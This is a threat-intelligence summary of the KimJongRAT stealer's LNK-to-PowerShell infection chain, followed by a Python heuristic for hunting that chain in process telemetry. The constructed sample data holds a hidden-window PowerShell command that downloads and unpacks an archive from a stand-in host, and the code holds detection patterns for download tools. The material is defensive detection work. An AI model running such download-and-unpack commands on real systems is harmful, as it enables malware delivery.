Intel Name: Exploring a New KimJongRAT Stealer Variant and Its PowerShell Implementation
Date of Scan: June 18, 2025
Impact: High
Summary: KimJongRAT, first identified in 2013, now appears in two variants: a Portable Executable (PE) version and a PowerShell version. Both infection chains start with a malicious LNK (Windows shortcut) file that fetches droppers from a CDN. The PE dropper delivers a loader, a decoy PDF, and a text file, while the PowerShell dropper unpacks a PDF and a ZIP archive containing the stealer and keylogger. Both variants exfiltrate browser, cryptocurrency-wallet, and system data to an attacker-controlled server.
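The chain described above (a double-clicked LNK launching PowerShell, which pulls a payload from a remote host, unpacks an archive and shows a PDF) is generic enough to hunt for in process-creation telemetry. The following is an added example written for this page, not code or indicators from the report: a scoring heuristic over constructed, simplified Sysmon-style process events. The patterns, threshold and sample command lines are assumptions chosen to illustrate the approach; tune them to your own telemetry before relying on them.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Simplified process-creation record (Sysmon Event ID 1 style)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Heuristic patterns, assumed for this example; they are not indicators from the report.
URL_RE      = re.compile(r"https?://[^\s'\"]+", re.I)
HIDDEN_RE   = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
DOWNLOAD_RE = re.compile(r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer|\bcurl\b", re.I)
UNPACK_RE   = re.compile(r"expand-archive|extracttodirectory|\.zip\b", re.I)
DECOY_RE    = re.compile(r"\.pdf\b", re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcEvent, by_pid: dict[int, ProcEvent]) -> tuple[int, list[str]]:
    """Return (score, reasons) for one event; only PowerShell hosts are scored."""
    if basename(ev.image) not in ("powershell.exe", "pwsh.exe"):
        return 0, []
    reasons: list[str] = []
    parent = by_pid.get(ev.ppid)
    # A shortcut opened from the desktop or a folder runs with explorer.exe as parent.
    if parent is not None and basename(parent.image) == "explorer.exe":
        reasons.append("spawned by explorer.exe (consistent with a double-clicked LNK)")
    if HIDDEN_RE.search(ev.cmdline):
        reasons.append("hidden window")
    if URL_RE.search(ev.cmdline) and DOWNLOAD_RE.search(ev.cmdline):
        reasons.append("downloads from a remote URL")
    if UNPACK_RE.search(ev.cmdline):
        reasons.append("unpacks an archive")
    if DECOY_RE.search(ev.cmdline):
        reasons.append("writes or opens a PDF (possible decoy)")
    return len(reasons), reasons


def hunt(events: list[ProcEvent], threshold: int = 3) -> list[tuple[ProcEvent, list[str]]]:
    """Flag PowerShell processes whose heuristic score reaches the threshold."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in events:
        score, reasons = score_event(ev, by_pid)
        if score >= threshold:
            hits.append((ev, reasons))
    return hits


# Constructed sample telemetry for this example (not captured from a real infection).
SAMPLE_EVENTS = [
    ProcEvent(100, 1,   r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -w hidden -c "iwr http://cdn.example.net/a/x -OutFile $env:TEMP\\p.zip; '
              'Expand-Archive $env:TEMP\\p.zip $env:TEMP\\p; Start-Process $env:TEMP\\p\\decoy.pdf"'),
    ProcEvent(300, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -NoProfile -Command "Get-Date"'),
    ProcEvent(400, 100, r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),
]


if __name__ == "__main__":
    for ev, reasons in hunt(SAMPLE_EVENTS):
        print(f"pid {ev.pid}: {'; '.join(reasons)}")
```

Only the event that combines several of the described traits is flagged; an interactive PowerShell session started from Explorer scores one point and stays below the threshold. In production, feed real process-creation events (with parent image and full command line) in place of SAMPLE_EVENTS and add file-creation events for the dropped PDF and archive as further signals.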